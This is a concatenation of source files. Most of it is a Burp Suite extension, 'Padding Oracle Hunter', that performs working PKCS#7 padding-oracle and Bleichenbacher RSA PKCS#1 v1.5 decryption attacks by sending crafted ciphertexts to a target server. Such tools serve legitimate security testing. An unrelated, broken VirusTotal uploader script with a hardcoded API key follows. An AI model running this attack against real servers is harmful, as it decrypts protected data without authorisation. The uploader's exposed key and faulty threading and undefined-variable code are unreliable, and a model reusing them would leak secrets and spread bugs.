self.gIsPayloadUrlEncodedPKCS7 = True
try:
# Get the payload format and convert it to hex
payload = self.ConverToHexFromPayloadFormat(payload, self.__jComboBoxFormatPKCS7.getSelectedItem(), self.gIsPayloadUrlEncodedPKCS7)
if(payload!=None):
# validate whether the payload is hex
unhexlify(payload.encode())
self.gPayloadPKCS7 = payload
self.gPayloadFormatPKCS7 = self.__jComboBoxFormatPKCS7.getSelectedItem()
# Replace the selected payload with #PAYLOAD# so that we can process it during the attack
self.gHttpRequestStringPKCS7 = self.gHttpRequestRawStringPKCS7.replace(self.gSelectedPayloadPKCS7, "#PAYLOAD#")
# Show the selected the payload
bytesDisplay = self.gHttpRequestRawStringPKCS7.encode()
insertionPointChar = chr(167)
bytesDisplay = bytesDisplay.replace(self.gSelectedPayloadPKCS7.encode(), insertionPointChar + self.gSelectedPayloadPKCS7.encode() + insertionPointChar)
self.__jEditorPaneReqPKCS7.setText(bytesDisplay)
# Disabled the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS7.setEnabled(False)
self.__jCheckBoxUrlEncodedPKCS7.setEnabled(False)
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return
def PKCS7(self, invocation):
# Intialize the variables
self.gHttpRequestRawStringPKCS7=""
self.gHttpRequestStringPKCS7=""
self.gPayloadPKCS7=""
self.gPayloadFormatPKCS7=""
self.gSelectedPayloadPKCS7=None
self.gOpThreadPKCS7 = None
self.gIsPayloadUrlEncodedPKCS7 = False
# enabled the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS7.setSelectedIndex(0)
self.__jComboBoxFormatPKCS7.setEnabled(True)
self.__jCheckBoxUrlEncodedPKCS7.setSelected(False)
self.__jCheckBoxUrlEncodedPKCS7.setEnabled(True)
# Get the http request message
invMessages = invocation.getSelectedMessages()
if len(invMessages) == 0:
return
self.gReqResPKCS7 = invMessages[0]
self.gHttpRequestRawStringPKCS7 = self._helpers.bytesToString(self.gReqResPKCS7.getRequest())
self.__jEditorPaneReqPKCS7.setText(self.gHttpRequestRawStringPKCS7)
# Reset all the fields
self.__textPadMessagePKCS7.setText("")
self.__textPlaintextPKCS7.setText("")
self.__jTextAreaOutputPKCS7.setText("")
# switch to the PKCS7 tab
self._jPaddingOracleTab.setSelectedComponent(self.__jPanelPKCS7)
parentTab = self._jPaddingOracleTab.getParent()
parentTab.setSelectedComponent(self._jPaddingOracleTab)
# *************************************** PKCS#1 v1.5 ***************************************
# global variables
gReqResPKCS15 = IHttpRequestResponse
gHttpRequestRawStringPKCS15 = ""
gPayloadPKCS15 = ""
gOpThreadPKCS15 = None
gSelectedPayloadPKCS15 = None
gModulusPKCS15=0
gExponentPKCS15=0
gPadMsgSelPKCS15 = ""
gPadMsgPKCS15 = ""
gByteLenPKCS15 = 0
gQueriesPKCS15 = 0
gTimePKCS15 = 0
gIntervalPKCS15 = namedtuple('Interval', ['lower_bound', 'upper_bound'])
gIsPayloadUrlEncodedPKCS15 = False
def DisplayOutput_PKCS15(self, text):
self.__jTextAreaOutputPKCS15.append(text)
def setGUI_PKCS15(self):
self.__jPanelPKCS15 = JPanel()
jPanelLayoutPKCS15 = GroupLayout(self.__jPanelPKCS15)
self.__jPanelPKCS15.setLayout(jPanelLayoutPKCS15)
jPanelLayoutPKCS15.setAutoCreateGaps(True)
jPanelLayoutPKCS15.setAutoCreateContainerGaps(True)
self.__jLabelReqPKCS15 = JLabel("Request")
self.__jScrollPaneReqPKCS15 = JScrollPane()
self.__jEditorPaneReqPKCS15 = JEditorPane()
self.__jEditorPaneReqPKCS15.setEditable(False)
self.__jScrollPaneReqPKCS15.setViewportView(self.__jEditorPaneReqPKCS15)
self.__jButtonClearPayloadPKCS15 = JButton("Clear Selection",actionPerformed=self.clearPayload_PKCS15)
self.__jButtonSelPayloadPKCS15 = JButton("Select Payload",actionPerformed=self.selectPayload_PKCS15)
self.__jLabelFormatPKCS15 = JLabel("Format:")
self.__jComboBoxFormatPKCS15 = JComboBox(['Hex', 'Base64', 'Decimal'])
self.__jComboBoxFormatPKCS15.setSelectedIndex(0)
self.__jCheckBoxUrlEncodedPKCS15=JCheckBox("Url Encoded")
self.__jLabelPublicExpPKCS15 = JLabel("Public Exponent e:")
self.__textPublicExpPKCS15 = JTextField()
self.__textPublicExpPKCS15.setToolTipText("RSA public exponent in decimal")
self.__jLabelPublicModPKCS15 = JLabel("Public Modulus n:")
self.__textPublicModPKCS15 = JTextField()
self.__textPublicModPKCS15.setToolTipText("RSA public modulus in decimal")
self.__jLabelPadMessagePKCS15 = JLabel("Padding Response:")
self.__textPadMessagePKCS15 = JTextField()
self.__textPadMessagePKCS15.setToolTipText("part or full of the valid or invalid padding response, only used in the decryption operation")
self.__jComboBoxPadMsgPKCS15 = JComboBox(['Invalid', 'Valid'])
self.__jComboBoxPadMsgPKCS15.setSelectedIndex(0)
self.__jLabelUpdateIntervalPKCS15 = JLabel("Update Interval:")
self.__jComboBoxUpdateIntervalPKCS15 = JComboBox(['100', '1000', '10000'])
self.__jComboBoxUpdateIntervalPKCS15.setSelectedIndex(0)
self.__jButtonTestPKCS15 = JButton("Test", actionPerformed=self.testPayload_PKCS15)
self.__jButtonDecPKCS15 = JButton("Decrypt", actionPerformed=self.decryptPayload_PKCS15)
self.__jButtonStopPKCS15 = JButton("Stop", actionPerformed=self.stopOperation_PKCS15)
self.__jLabelOutPKCS15 = JLabel("Output")
self.__jTextAreaOutputPKCS15 = JTextArea()
self.__jTextAreaOutputPKCS15.setEditable(False)
self.__jTextAreaOutputPKCS15.setColumns(20)
self.__jTextAreaOutputPKCS15.setRows(5)
self.__jScrollPaneOutPKCS15 = JScrollPane()
self.__jScrollPaneOutPKCS15.setViewportView(self.__jTextAreaOutputPKCS15)
jPanelLayoutPKCS15.setHorizontalGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelReqPKCS15)
.addComponent(self.__jScrollPaneReqPKCS15, GroupLayout.PREFERRED_SIZE, 0, 1080)
.addGroup(
jPanelLayoutPKCS15.createSequentialGroup()
.addGap(300, 300, 300)
.addComponent(self.__jButtonSelPayloadPKCS15)
.addGap(20, 20, 20)
.addComponent(self.__jLabelFormatPKCS15)
.addComponent(self.__jComboBoxFormatPKCS15,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addGap(20, 20, 20)
.addComponent(self.__jCheckBoxUrlEncodedPKCS15)
.addGap(20, 20, 20)
.addComponent(self.__jButtonClearPayloadPKCS15))
.addGroup(
jPanelLayoutPKCS15.createSequentialGroup()
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelPublicExpPKCS15)
.addComponent(self.__jLabelPublicModPKCS15)
.addComponent(self.__jLabelPadMessagePKCS15)
.addComponent(self.__jLabelUpdateIntervalPKCS15))
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__textPublicExpPKCS15, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textPublicModPKCS15, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textPadMessagePKCS15, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jComboBoxUpdateIntervalPKCS15,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addComponent(self.__jComboBoxPadMsgPKCS15,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addComponent(self.__jLabelOutPKCS15)
.addComponent(self.__jScrollPaneOutPKCS15,GroupLayout.PREFERRED_SIZE, 0, 1080)
.addGroup(
jPanelLayoutPKCS15.createSequentialGroup()
.addGap(240, 240, 240)
.addComponent(self.__jButtonTestPKCS15)
.addGap(165, 165, 165)
.addComponent(self.__jButtonDecPKCS15)
.addGap(165, 165, 165)
.addComponent(self.__jButtonStopPKCS15))
)
jPanelLayoutPKCS15.setVerticalGroup(
jPanelLayoutPKCS15.createSequentialGroup()
.addComponent(self.__jLabelReqPKCS15)
.addComponent(self.__jScrollPaneReqPKCS15, GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
.addGap(15, 15, 15)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jButtonSelPayloadPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jLabelFormatPKCS15)
.addComponent(self.__jComboBoxFormatPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jCheckBoxUrlEncodedPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonClearPayloadPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelPublicExpPKCS15)
.addComponent(self.__textPublicExpPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelPublicModPKCS15)
.addComponent(self.__textPublicModPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelPadMessagePKCS15)
.addComponent(self.__textPadMessagePKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jComboBoxPadMsgPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelUpdateIntervalPKCS15)
.addComponent(self.__jComboBoxUpdateIntervalPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addComponent(self.__jLabelOutPKCS15)
.addComponent(self.__jScrollPaneOutPKCS15,GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jButtonTestPKCS15, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonDecPKCS15, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonStopPKCS15, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE))
.addGap(50, 50, 50)
)
def BytesToLong_PKCS15(self, bytes_obj):
return int(hexlify(bytes_obj),16)
def LongToBytes_PKCS15(self, integer):
value = hex(integer).replace('0x','').rstrip("L")
if(len(value)%2 != 0):
value = "0" + value
return unhexlify(value)
# math.ceil and math.floor don't work for large integers
def Floor_PKCS15(self, a, b):
return a // b
def Ceil_PKCS15(self, a, b):
return a // b + (a % b > 0)
def Decode_PKCS15(self, encoded):
encoded = encoded[2:]
idx = encoded.index(b'\x00')
message = encoded[idx + 1:]
return message
def Encode_PKCS15(self, message, total_bytes):
# Encodes the given message using PKCS1 v1.5 scheme:
# PKCS1(M) = 0x00 | 0x02 | [non-zero padding bytes] | 0x00 | [M]
# length(PKCS1(M)) = total_bytes
# 11 = 3 constant bytes and at aleast 8 bytes for padding
padding_byte = b''
if len(message) > total_bytes - 11:
self.DisplayOutput_PKCS15("Message to big for encoding scheme!")
return
pad_len = total_bytes - 3 - len(message)
# non-zero padding bytes
randombyte = random.sample(range(1, 256), pad_len)
for r in randombyte:
padding_byte = chr(r) + padding_byte
encoded = b'\x00\x02' + padding_byte + b'\x00' + message
return encoded
def ServiceRequest_PKCS15(self, ciphertext):
try:
# Convert the payload back to the original format from hex
payload = self.ConvertFromHexToPayloadFormat(ciphertext, self.gPayloadFormatPKCS15, self.gIsPayloadUrlEncodedPKCS15)
if(payload!=None):
# Replaced the request with payload
newHttpRequest = self.gHttpRequestStringPKCS15.replace("#PAYLOAD#", payload)
# Update the request with new parameter
reqInfo = self._helpers.analyzeRequest(newHttpRequest)
headers = reqInfo.getHeaders()
param = newHttpRequest[reqInfo.getBodyOffset():]
newHttpRequest = self._helpers.buildHttpMessage(headers, param)
# Send the request
httpService = self.gReqResPKCS15.getHttpService()
res = self._callbacks.makeHttpRequest(self._helpers.buildHttpService(httpService.getHost(),httpService.getPort(), httpService.getProtocol()), newHttpRequest)
return res.getResponse()
except Exception as e:
self.DisplayOutput_PKCS15("Service request Error: {}".format(e))
return ""
def Oracle_PKCS15(self, ciphertext):
# Increment the queries
self.gQueriesPKCS15 +=1
# Retrieve the update interval
updateInterval = int(self.__jComboBoxUpdateIntervalPKCS15.getSelectedItem())
# Update the query base on the update Interval
if self.gQueriesPKCS15 % updateInterval == 0:
currentTime = time.time()
self.DisplayOutput_PKCS15("Query: #{} time: {} s\n".format(self.gQueriesPKCS15, round(currentTime - self.gTimePKCS15,3)))
# send the service request
response = self.ServiceRequest_PKCS15(ciphertext)
# if the message is an invalid padding message
if self.gPadMsgSelPKCS15=="Invalid":
if hexlify(self.gPadMsgPKCS15.encode()) in hexlify(response):
return False
else:
return True
# if the message is a valid padding message
else:
if hexlify(self.gPadMsgPKCS15.encode()) not in hexlify(response):
return False
else:
return True
# Step 2.A.
def FindSmallest_PKCS15(self,lower_bound, c):
"""
Find the smallest s >= lower_bound,
such that (c * s^e) (mod n) decrypts to a PKCS conforming string
"""
s = lower_bound
while True:
if(self.gThreadStopPKCS15 == True):
return
attempt = (c * pow(s, self.gExponentPKCS15, self.gModulusPKCS15)) % self.gModulusPKCS15
if self.Oracle_PKCS15(hexlify(self.LongToBytes_PKCS15(attempt)).decode()):
return s
s += 1
# Step 2.C.
def FindInRange_PKCS15(self, a, b, prev_s, B, c):
"""
Given the interval [a, b], reduce the search
only to relevant regions (determined by r)
and stop when an s value that gives
a PKCS1 conforming string is found.
"""
ri = self.Ceil_PKCS15(2 * (b * prev_s - 2 * B), self.gModulusPKCS15)
while True:
if(self.gThreadStopPKCS15 == True):
return
si_lower = self.Ceil_PKCS15(2 * B + ri * self.gModulusPKCS15, b)
si_upper = self.Ceil_PKCS15(3 * B + ri * self.gModulusPKCS15, a)
for si in range(si_lower, si_upper):
attempt = (c * pow(si, self.gExponentPKCS15, self.gModulusPKCS15)) % self.gModulusPKCS15
# get oracle from the server
if self.Oracle_PKCS15(hexlify(self.LongToBytes_PKCS15(attempt)).decode()):
return si
ri += 1
def SafeIntervalInsert_PKCS15(self, M_new, interval):
# Deal with interval overlaps when adding a new one to the list
for i, (a, b) in enumerate(M_new):
# overlap found, construct the larger interval
if (b >= interval.lower_bound) and (a <= interval.upper_bound):
lb = min(a, interval.lower_bound)
ub = max(b, interval.upper_bound)
M_new[i] = self.gIntervalPKCS15(lb, ub)
return M_new
# no overlaps found, just insert the new interval
M_new.append(interval)
return M_new
# Step 3.
def UpdateIntervals_PKCS15(self, M, s, B):
# After found the s value, compute the new list of intervals
M_new = []
for a, b in M:
r_lower = self.Ceil_PKCS15(a * s - 3 * B + 1, self.gModulusPKCS15)
r_upper = self.Ceil_PKCS15(b * s - 2 * B, self.gModulusPKCS15)
for r in range(r_lower, r_upper):
lower_bound = max(a, self.Ceil_PKCS15(2 * B + r * self.gModulusPKCS15, s))
upper_bound = min(b, self.Floor_PKCS15(3 * B - 1 + r * self.gModulusPKCS15, s))
interval = self.gIntervalPKCS15(lower_bound, upper_bound)
M_new = self.SafeIntervalInsert_PKCS15(M_new, interval)
return M_new
def Bleichenbacher_PKCS15(self, ciphertext):
# Get the intial time
self.gTimePKCS15 = time.time()
self.DisplayOutput_PKCS15("Decrypting ciphertext: {}\n\n".format(self.gSelectedPayloadPKCS15))
# Step 1. is only needed when the ciphertext is
# not PKCS1 conforming
# integer value of ciphertext
c = self.BytesToLong_PKCS15(ciphertext)
B = 2 ** (8 * (self.gByteLenPKCS15 - 2))
M = [self.gIntervalPKCS15(2*B, 3*B-1)]
i = 1
while True:
if(self.gThreadStopPKCS15 == True):
return
# Step 2.A.
if i==1:
s = self.FindSmallest_PKCS15(self.Ceil_PKCS15(self.gModulusPKCS15, 3*B), c)
# Step 2.B.
elif len(M) > 1:
s = self.FindSmallest_PKCS15(s + 1, c)
# Step 2.C.
else: # len(M)=1
a, b = M[0]
s = self.FindInRange_PKCS15(a, b, s, B, c)
# Step 3.
M = self.UpdateIntervals_PKCS15(M, s, B)
# Step 4.
if len(M) == 1:
a, b = M[0]
if a == b:
# Update the last query
updateInterval = int(self.__jComboBoxUpdateIntervalPKCS15.getSelectedItem())
if(self.gQueriesPKCS15 % updateInterval !=0):
currentTime = time.time()
self.DisplayOutput_PKCS15("Query: #{} time: {} s\n".format(self.gQueriesPKCS15, round(currentTime - self.gTimePKCS15,3)))
# Output the plaintext
plaintext = self.LongToBytes_PKCS15(a % self.gModulusPKCS15)
plaintext = self.Decode_PKCS15(plaintext)
self.DisplayOutput_PKCS15("\nDecrypted plaintext:\n")
self.DisplayOutput_PKCS15("Hex: {}\n".format(hexlify(plaintext)))
self.DisplayOutput_PKCS15("Bytes: {}\n".format(plaintext))
return
i=i+1
def Test_PKCS15(self):
# compute test value with valid padding
testValidPadValue = self.BytesToLong_PKCS15(self.Encode_PKCS15(b"test_pkcs15",self.gByteLenPKCS15))
testValidPadCipher = pow(testValidPadValue, self.gExponentPKCS15, self.gModulusPKCS15)
testValidPadResult = self.ServiceRequest_PKCS15(hexlify(self.LongToBytes_PKCS15(testValidPadCipher)).decode())
ResInfo = self._helpers.analyzeResponse(testValidPadResult)
testValidPadResponse = testValidPadResult[ResInfo.getBodyOffset():]
# compute test value with invalid padding
testInvalidPadValue = self.BytesToLong_PKCS15(b"test_pkcs15")
testInvalidPadCipher = pow(testInvalidPadValue, self.gExponentPKCS15, self.gModulusPKCS15)
testInvalidPadResult = self.ServiceRequest_PKCS15(hexlify(self.LongToBytes_PKCS15(testInvalidPadCipher)).decode())
ResInfo = self._helpers.analyzeResponse(testInvalidPadResult)
testInvalidPadResponse = testInvalidPadResult[ResInfo.getBodyOffset():]
# The sever is vulnerable if the response with valid padding is not equal to the response with invalid padding
if(testValidPadResponse!=testInvalidPadResponse):
self.__jTextAreaOutputPKCS15.setForeground(Color(255, 0, 0))
# Display invalid padding response
self.DisplayOutput_PKCS15("**** Invalid Padding ****\n")
payload = self.ConvertFromHexToPayloadFormat(hexlify(self.LongToBytes_PKCS15(testInvalidPadCipher)).decode(),self.gPayloadFormatPKCS15, self.gIsPayloadUrlEncodedPKCS15)
self.DisplayOutput_PKCS15("Payload:\n{}\n".format(payload))
self.DisplayOutput_PKCS15("Response:\n{}\n\n".format(unhexlify(hexlify(testInvalidPadResponse))))
# Display valid padding response
self.DisplayOutput_PKCS15("**** Valid Padding ****\n")
payload = self.ConvertFromHexToPayloadFormat(hexlify(self.LongToBytes_PKCS15(testValidPadCipher)).decode(),self.gPayloadFormatPKCS15, self.gIsPayloadUrlEncodedPKCS15)
self.DisplayOutput_PKCS15("Payload:\n{}\n".format(payload))
self.DisplayOutput_PKCS15("Response:\n{}\n\n".format(unhexlify(hexlify(testValidPadResponse))))
# Display the conclusion
self.DisplayOutput_PKCS15("The server is likely vulnerable to padding oracle attack\n")
else:
# Display the conclusion
self.DisplayOutput_PKCS15("The server is not vulnerable to padding oracle attack\n")
def InputValidation_PKCS15(self, mode):
try:
# Set default font display to black
self.__jTextAreaOutputPKCS15.setForeground(Color(0, 0, 0))
# make sure all the previous thread was terminated
if self.gOpThreadPKCS15!=None and self.gOpThreadPKCS15.isAlive():
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Previous thread is still running! Please click stop button to terminate it", "Warning", JOptionPane.WARNING_MESSAGE)
return False
# reset the variables
self.gThreadStopPKCS15 = False
self.__jTextAreaOutputPKCS15.setText("")
self.gQueriesPKCS15 = 0
# check if the payload is selected
if self.gSelectedPayloadPKCS15==None:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Incorrect payload selection!", "Error", JOptionPane.ERROR_MESSAGE)
return False
# Get public exponent
exponent = re.sub('\W+','', self.__textPublicExpPKCS15.getText())
if exponent=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide the RSA public exponent in decimal!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gExponentPKCS15 = int(exponent, 10)
# Get public modulus
modulus = re.sub('\W+','',self.__textPublicModPKCS15.getText())
if modulus=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide the RSA public modulus in decimal!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gModulusPKCS15 = int(modulus, 10)
# Compute the ByteLength
self.gByteLenPKCS15 = self.gModulusPKCS15.bit_length()//8
# Get valid or invalid padding message
if mode=="decrypt":
self.gPadMsgSelPKCS15 = self.__jComboBoxPadMsgPKCS15.getSelectedItem()
padmsg = self.__textPadMessagePKCS15.getText()
if padmsg=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide part or full of the valid or invalid padding response!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gPadMsgPKCS15 = padmsg
return True
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return False
def PKCS15(self, invocation):
# Intialize variables
self.gHttpRequestRawStringPKCS15=""
self.gHttpRequestStringPKCS15=""
self.gPayloadPKCS15=""
self.gPayloadFormatPKCS15=""
self.gSelectedPayloadPKCS15=None
self.gOpThreadPKCS15 = None
self.gIsPayloadUrlEncodedPKCS15 = False
# enabled the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS15.setSelectedIndex(0)
self.__jComboBoxFormatPKCS15.setEnabled(True)
self.__jCheckBoxUrlEncodedPKCS15.setSelected(False)
self.__jCheckBoxUrlEncodedPKCS15.setEnabled(True)
# Get and set the http request message
invMessages = invocation.getSelectedMessages()
if len(invMessages) == 0:
return
self.gReqResPKCS15 = invMessages[0]
self.gHttpRequestRawStringPKCS15 = self._helpers.bytesToString(self.gReqResPKCS15.getRequest())
self.__jEditorPaneReqPKCS15.setText(self.gHttpRequestRawStringPKCS15)
# Reset all the fields
self.__textPublicExpPKCS15.setText("")
self.__textPublicModPKCS15.setText("")
self.__textPadMessagePKCS15.setText("")
self.__jTextAreaOutputPKCS15.setText("")
self.__jComboBoxUpdateIntervalPKCS15.setSelectedIndex(0)
# switch to the PKCS1_5 tab
self._jPaddingOracleTab.setSelectedComponent(self.__jPanelPKCS15)
parentTab = self._jPaddingOracleTab.getParent()
parentTab.setSelectedComponent(self._jPaddingOracleTab)
def selectPayload_PKCS15(self, button):
# Retrieve the selected the payload
payload = self.__jEditorPaneReqPKCS15.getSelectedText().replace("\n", "")
# Stored the selected the payload
self.gSelectedPayloadPKCS15 = payload
if(payload!=None):
# Check whether the payload is url encoded.
if self.__jCheckBoxUrlEncodedPKCS15.isSelected():
self.gIsPayloadUrlEncodedPKCS15 = True
# Get the payload format and convert it to hex
try:
payload = self.ConverToHexFromPayloadFormat(payload, self.__jComboBoxFormatPKCS15.getSelectedItem(), self.gIsPayloadUrlEncodedPKCS15)
if payload != None:
# validate the payload is hex
unhexlify(payload.encode())
self.gPayloadPKCS15 = payload
self.gPayloadFormatPKCS15 = self.__jComboBoxFormatPKCS15.getSelectedItem()
# Replace the selected payload with #PAYLOAD# so that we can process it during the attack
self.gHttpRequestStringPKCS15 = self.gHttpRequestRawStringPKCS15.replace(self.gSelectedPayloadPKCS15, "#PAYLOAD#")
# Show the selected the payload
bytesDisplay = self.gHttpRequestRawStringPKCS15.encode()
insertionPointChar = chr(167)
bytesDisplay = bytesDisplay.replace(self.gSelectedPayloadPKCS15.encode(), insertionPointChar + self.gSelectedPayloadPKCS15.encode() + insertionPointChar)
self.__jEditorPaneReqPKCS15.setText(bytesDisplay)
# Disabled the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS15.setEnabled(False)
self.__jCheckBoxUrlEncodedPKCS15.setEnabled(False)
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return
def testPayload_PKCS15(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS15("test")
if(initStatus):
# Start the Testing Thread
self.gOpThreadPKCS15 = threading.Thread(target=self.Test_PKCS15)
self.gOpThreadPKCS15.start()
def decryptPayload_PKCS15(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS15("decrypt")
if(initStatus):
# Start the Decryption Thread
encrypted_string = unhexlify(self.gPayloadPKCS15)
self.gOpThreadPKCS15 = threading.Thread(target=self.Bleichenbacher_PKCS15, args=(encrypted_string,))
self.gOpThreadPKCS15.start()
def stopOperation_PKCS15(self, button):
self.DisplayOutput_PKCS15("Operation halted!\n")
self.gThreadStopPKCS15 = True
def clearPayload_PKCS15(self, button):
if self.gHttpRequestRawStringPKCS15 !="":
self.__jEditorPaneReqPKCS15.setText(self.gHttpRequestRawStringPKCS15)
self.gSelectedPayloadPKCS15 = None
# Enabled the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS15.setEnabled(True)
self.__jCheckBoxUrlEncodedPKCS15.setEnabled(True)
# *************************************** Common Function ***************************************
def ConvertFromHexToPayloadFormat(self, payload, format, urlEncoded):
try:
# default format is hex
if format=="Base64":
# convert the hex encrypted_string to base64
payload = unhexlify(payload)
payload = self._helpers.base64Encode(payload).decode()
elif format=="Decimal":
# convert the hex encrypted_string to decimal
payload = str(int(payload,16))
# Url Encode the payload if urlencoded checkbox is checked
if(urlEncoded):
payload = self._helpers.urlEncode(payload)
return payload
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return None
def ConverToHexFromPayloadFormat(self, payload, format, urlEncoded):
try:
# Check whether the payload is url encoded. If yes, url decode the payload
if (urlEncoded):
payload = self._helpers.urlDecode(payload)
# default format is hex
if format=="Base64":
# check whether the payload is base64
payload = base64.b64decode(payload)
# convert the payload to hex
payload = hexlify(payload).decode()
elif format=="Decimal":
if (payload.isdecimal()==False):
raise ValueError("The payload is not decimal")
# convert the payload to hex
payload = hex(int(payload)).rstrip("L").replace("0x","")
payload = payload.rjust(len(payload)+len(payload)%2,"0")
return payload
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return None
def registerExtenderCallbacks(self, callbacks):
# Set up the context menu
self.printInfo()
callbacks.setExtensionName("Padding Oracle Hunter")
callbacks.registerExtensionStateListener(self)
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.registerContextMenuFactory(self)
# Create PKCS GUI
self.setGUI_PKCS7()
self.setGUI_PKCS15()
# Setup PKCS Tabs
self._jPaddingOracleTab = JTabbedPane()
self._jPaddingOracleTab.addTab("PKCS#7", self.__jPanelPKCS7)
self._jPaddingOracleTab.addTab("PKCS#1 v1.5", self.__jPanelPKCS15)
callbacks.customizeUiComponent(self._jPaddingOracleTab)
callbacks.addSuiteTab(self)
def createMenuItems(self, invocation):
# Create a menu item if the appropriate section of the UI is selected
menu = []
# Which part of the interface the user selects
ctx = invocation.getInvocationContext()
# Message Viewer Req will show menu item if selected by the user
if ctx == IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_REQUEST or ctx == IContextMenuInvocation.CONTEXT_MESSAGE_VIEWER_REQUEST:
menu.append(JMenuItem("PKCS#7", None, actionPerformed=lambda x, inv=invocation: self.PKCS7(inv)))
menu.append(JMenuItem("PKCS#1 v1.5", None, actionPerformed=lambda x, inv=invocation: self.PKCS15(inv)))
return menu if menu else None
def extensionUnloaded(self):
# stop all the thread
self.gThreadStopPKCS7 = True
self.gThreadStopPKCS15 = True
def getTabCaption(self):
return "Padding Oracle Hunter"
def getUiComponent(self):
return self._jPaddingOracleTab
def printInfo(self):
print('Padding Oracle Hunter v1.1\nCreated by: GovTech (Tan Inn Fung)')
|
scanFile.py | import os
import threading
from requests import api
import virustotal3.core
import logging
import time
_API_KEY="3d29cdabf6d196748d9b810412d3494c6ebb7a4972427877a5196bc3ceadf01d"
_vsTotUploader=virustotal3.core.Files(api_key=_API_KEY)
#_FILE=os.path.abspath() FILE TO BE PASSED
_result=False
_info={}
print(_FILE)
def uploadAndStartScan(vsTotUploader: virustotal3.core.Files,filepath):
uploadId= vsTotUploader.upload(sample=filepath)['data']['id']
logging.info(uploadId)
return uploadId
def waitTillCompleted(apiKey,uploadId):
global _result
global _info
_result=False
statusGetter=threading.Thread(name="statusGetter",target=_getStatus(apiKey,uploadId,2))
_info=virustotal3.core.get_analysis(apiKey,uploadId)
waitShow=threading.Thread(name="waitShow",target=_showWaitDialog())
waitShow.start()
statusGetter.start()
def _showWaitDialog():
global _result
lst=['/','|','\\','-','/']
i=0
while (not _result):
print("working ",lst[i],end="\r")
time.sleep(0.1)
i=(i+1)%5
def _getStatus(apiKey,uploadId,sleep):
global _result
global _info
time.sleep(sleep)
while not _result:
info=virustotal3.core.get_analysis(apiKey,uploadId)
